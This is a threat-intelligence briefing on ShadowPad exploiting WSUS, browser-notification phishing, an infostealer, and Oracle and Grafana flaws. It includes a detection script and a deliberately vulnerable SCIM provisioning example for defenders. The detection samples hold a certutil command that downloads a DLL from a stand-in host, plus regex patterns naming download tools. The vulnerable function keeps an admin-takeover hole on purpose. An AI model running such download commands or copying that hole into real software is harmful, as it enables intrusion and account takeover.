Daily Threat Briefing
Diamond Trail

Cyware Daily Threat Intelligence, November 24, 2025


State-sponsored hackers are turning a critical Windows maintenance tool into a gateway for espionage. A vulnerability in WSUS is being actively exploited to deploy the ShadowPad backdoor, a favorite tool of Chinese threat groups. The attackers use legitimate system utilities to slip past defenses and gain full control over compromised servers.

That harmless-looking browser notification might actually be a sophisticated trap. A new MaaS platform called Matrix Push C2 is using browser alerts to launch fileless phishing attacks across different operating systems. By mimicking legitimate system warnings or login alerts, attackers can trick users into clicking malicious links without ever needing to install a file on the device.

Grafana has issued a warning for a "perfect 10" severity vulnerability that could let attackers walk right into administrator accounts. The critical flaw in Grafana Enterprise affects the SCIM user provisioning feature, allowing a malicious user to overwrite internal IDs and take over high-privilege accounts.

Top Malware Reported in the Last 24 Hours

ShadowPad malware abuses WSUS flaw

A recently disclosed vulnerability in Microsoft Windows Server Update Services (WSUS), tracked as CVE-2025-59287, is being actively exploited to deliver ShadowPad. This modular backdoor, long associated with Chinese state-sponsored groups, gives attackers full control of the host by executing remote code with system privileges. After the initial breach, the attackers stage ShadowPad with living-off-the-land tooling: the built-in Windows utilities certutil and curl, plus PowerCat, an open-source PowerShell netcat implementation that is not part of Windows and therefore has no business on a patch server. ShadowPad itself is launched through DLL side-loading, using a legitimate binary to load the malicious payload, and carries several anti-analysis and anti-detection features.
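The staging chain described above (WSUS service, then a shell, then certutil, curl or PowerCat pulling a payload) is what a hunt query should key on. The following is an added example for this briefing, not code from Microsoft, from the reporting vendor, or from any ShadowPad sample. It assumes process-creation telemetry is available as records carrying pid, ppid, image, parent_image and command_line (Sysmon Event ID 1 has all of these), and it assumes the WSUS service binary is named WsusService.exe; both are assumptions to check against your own telemetry. The sample events are constructed.

```python
"""Hunt for living-off-the-land downloads spawned beneath the WSUS service.

Added example, not vendor code. Assumed: Sysmon-style process-creation
records and a WSUS service process named WsusService.exe. Sample batch below
is constructed; 203.0.113.0/24 is documentation address space.
"""
import re

# Assumption: the WSUS service process name. Extend if your deployment differs.
WSUS_PROCESSES = {"wsusservice.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}

# Command-line indicators of the tools named in the report being used to pull a
# payload onto the host. Matched against every image, so a "cmd.exe /c certutil"
# wrapper is caught as well as the certutil process itself.
DOWNLOAD_RE = re.compile(
    r"certutil(\.exe)?\s.*-urlcache"            # certutil as a downloader
    r"|\bcurl(\.exe)?\s.*https?://"             # curl fetching a URL
    r"|powercat"                                # PowerShell netcat
    r"|downloadstring|downloadfile|invoke-webrequest|net\.webclient",
    re.IGNORECASE,
)


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def ancestors(event: dict, by_pid: dict, max_depth: int = 4) -> list[str]:
    """Walk ppid links up to max_depth; when a parent's own creation event is
    not in the batch, fall back to the parent_image recorded on the child."""
    chain = []
    cur = event
    for _ in range(max_depth):
        parent = by_pid.get(cur.get("ppid"))
        if parent is None:
            if cur.get("parent_image"):
                chain.append(basename(cur["parent_image"]))
            break
        chain.append(basename(parent["image"]))
        cur = parent
    return chain


def detect(events: list[dict]) -> list[dict]:
    """One alert per suspicious event.

    high   : download tool used anywhere beneath the WSUS service
    medium : download tool used elsewhere, or a shell spawned under WSUS
    """
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        image = basename(e["image"])
        chain = ancestors(e, by_pid)
        downloader = bool(DOWNLOAD_RE.search(e.get("command_line", "")))
        from_wsus = any(p in WSUS_PROCESSES for p in chain)
        if downloader and from_wsus:
            severity = "high"
        elif downloader or (from_wsus and image in SHELLS):
            severity = "medium"
        else:
            continue
        alerts.append({"pid": e["pid"], "image": image,
                       "severity": severity, "chain": chain})
    return alerts


# Constructed sample batch (not real telemetry).
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 4, "image": r"C:\Windows\System32\svchost.exe",
     "parent_image": r"C:\Windows\System32\services.exe",
     "command_line": "svchost.exe -k netsvcs"},
    {"pid": 200, "ppid": 4,
     "image": r"C:\Program Files\Update Services\Service\WsusService.exe",
     "parent_image": r"C:\Windows\System32\services.exe",
     "command_line": "WsusService.exe"},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Program Files\Update Services\Service\WsusService.exe",
     "command_line": r"cmd.exe /c certutil -urlcache -split -f http://203.0.113.5/x.dll C:\Windows\Temp\x.dll"},
    {"pid": 301, "ppid": 300, "image": r"C:\Windows\System32\certutil.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"certutil -urlcache -split -f http://203.0.113.5/x.dll C:\Windows\Temp\x.dll"},
    {"pid": 400, "ppid": 100, "image": r"C:\Windows\System32\certutil.exe",
     "parent_image": r"C:\Windows\System32\svchost.exe",
     "command_line": r"certutil -hashfile C:\Temp\setup.msi SHA256"},     # benign use
    {"pid": 500, "ppid": 50, "image": r"C:\Windows\System32\curl.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "curl.exe https://updates.example.org/notes.txt"},    # not under WSUS
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

Against the constructed batch this raises two high-severity alerts (the cmd.exe wrapper and the certutil child, both traced back to WsusService.exe through the ppid chain) and one medium alert for the curl download under explorer.exe, while the legitimate certutil -hashfile call is ignored. The ancestry walk matters: the direct parent of certutil is cmd.exe, so a rule that only inspects parent_image would miss the WSUS link.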

Matrix Push C2 exploits browser notifications

Matrix Push C2 is a new command-and-control platform that uses browser push notifications for fileless, cross-platform phishing. Once a victim has been socially engineered into allowing notifications from an attacker-controlled site, the operator can push alerts that appear to come from the operating system or the browser, such as suspicious-login warnings, and steer the victim to malicious links. Because nothing is ever written to the device, the technique sidesteps file-based defenses and gives the attacker a persistent push channel to the victim on any platform with a supporting browser. Sold as malware-as-a-service through crimeware channels, Matrix Push C2 ships with phishing templates that impersonate well-known brands, along with tooling to track victim interactions and measure how well a campaign is performing.

Xillen Stealer evolves with advanced features

Xillen Stealer, a Python-based information-stealing malware, has evolved into versions 4 and 5, significantly enhancing its targeting capabilities. This cross-platform tool now extracts sensitive data, including credentials from password managers and cryptocurrency wallets, while employing advanced anti-analysis techniques to evade detection. Notably, the AIEvasionEngine module mimics legitimate user behavior to bypass AI-based detection systems. Additionally, it collects data from various enterprise applications and cloud services, demonstrating a focus on high-value targets. The malware utilizes multi-layered exfiltration methods, including steganography and anonymizing networks, to obscure its activities. Marketed on Telegram with a professional GUI, Xillen Stealer poses a growing threat to organizations managing sensitive information, as its comprehensive feature set continues to develop.

Top Vulnerabilities Reported in the Last 24 Hours

CISA warns of actively exploited Oracle 0-day

CISA has added a critical vulnerability in Oracle Identity Manager, CVE-2025-61757, to its Known Exploited Vulnerabilities (KEV) catalog on evidence of active exploitation. The flaw, rated CVSS 9.8, lets unauthenticated remote attackers bypass authentication for critical functions and execute code: by appending certain strings to a request URI, an attacker can reach API endpoints that should require authentication, escalate privileges, and access sensitive systems. Honeypot logs show exploitation attempts before Oracle released a patch, indicating the flaw was likely abused as a zero-day. Federal agencies are required to apply the patch by December 12.

Grafana patches max severity flaw

Grafana has released security updates for a critical vulnerability, CVE-2025-41115, in its System for Cross-domain Identity Management (SCIM) component, which handles user provisioning. The flaw affects Grafana Enterprise versions 12.0.0 through 12.2.1 when SCIM user provisioning is enabled, and allows privilege escalation and user impersonation: a malicious or compromised SCIM client can provision a user with a purely numeric externalId, which can be mapped onto an existing internal user ID and so hand the attacker that account, including administrator accounts. The issue carries the maximum CVSS score of 10.0. Grafana has fixed it in subsequent releases; affected deployments should upgrade, or leave SCIM provisioning disabled where it is not in use until they can.
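The mechanism here is an identifier-confusion bug: a value the remote SCIM client controls is allowed to cross into the space of internal primary keys. The following is an added example for this briefing, not Grafana's code and not a reproduction of its data model; UserStore, User and the provision_* functions are invented to show the bug class beside a hardened form. The SCIM payload is constructed.

```python
"""Numeric-externalId confusion in a SCIM provisioning handler, vulnerable
beside hardened. Added illustration, not Grafana's code: the store, the User
record and both provision_* functions are invented for this example.
"""
import itertools
from dataclasses import dataclass
from typing import Optional


@dataclass
class User:
    id: int                     # internal numeric primary key
    login: str
    external_id: Optional[str]  # identity asserted by the SCIM client
    is_admin: bool = False


class UserStore:
    def __init__(self) -> None:
        self.by_id: dict[int, User] = {}
        self._ids = itertools.count(1)

    def add(self, login: str, is_admin: bool = False,
            external_id: Optional[str] = None) -> User:
        user = User(next(self._ids), login, external_id, is_admin)
        self.by_id[user.id] = user
        return user

    def by_external_id(self, ext: str) -> Optional[User]:
        return next((u for u in self.by_id.values() if u.external_id == ext), None)


def provision_vulnerable(store: UserStore, scim_user: dict) -> User:
    """Vulnerable: falls back to an internal-id lookup for numeric externalIds.

    A client that sends externalId "1" is matched to internal user 1, typically
    the first administrator, and that account is 'updated' and bound to the
    attacker-controlled SCIM identity instead of a fresh user being created.
    """
    ext = scim_user["externalId"]
    user = store.by_external_id(ext)
    if user is None and ext.isdigit():
        user = store.by_id.get(int(ext))     # the flawed fallback
    if user is None:
        return store.add(scim_user["userName"], external_id=ext)
    user.external_id = ext                   # SCIM identity now owns this account
    return user


def provision_hardened(store: UserStore, scim_user: dict) -> User:
    """Hardened: externalId is an opaque string that is never used as a key into
    internal ids, and empty or purely numeric values are rejected outright."""
    ext = scim_user.get("externalId") or ""
    if not ext or ext.isdigit():
        raise ValueError("externalId must be a non-empty, non-numeric opaque id")
    user = store.by_external_id(ext)
    if user is None:
        user = store.add(scim_user["userName"], external_id=ext)
    return user


def demo(provision) -> dict:
    """Run one provisioning path against a store holding a single admin and
    report what the attacker's SCIM payload ended up controlling."""
    store = UserStore()
    store.add("admin", is_admin=True)                       # internal id 1
    payload = {"userName": "attacker", "externalId": "1"}   # constructed SCIM user
    try:
        user = provision(store, payload)
    except ValueError as exc:
        return {"rejected": True, "reason": str(exc), "users": len(store.by_id)}
    return {"rejected": False, "login": user.login, "is_admin": user.is_admin,
            "users": len(store.by_id)}


if __name__ == "__main__":
    print("vulnerable:", demo(provision_vulnerable))
    print("hardened:  ", demo(provision_hardened))
```

In the vulnerable path the attacker's payload returns the admin record, now carrying the attacker's externalId, and no new user is created; in the hardened path the payload is rejected and the store is untouched. The design point is that a client-asserted identifier must live in its own namespace: look it up only against other external identifiers, and refuse values that could be mistaken for internal keys. Upgrading remains the actual fix for Grafana; this only shows what the fix has to guarantee.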
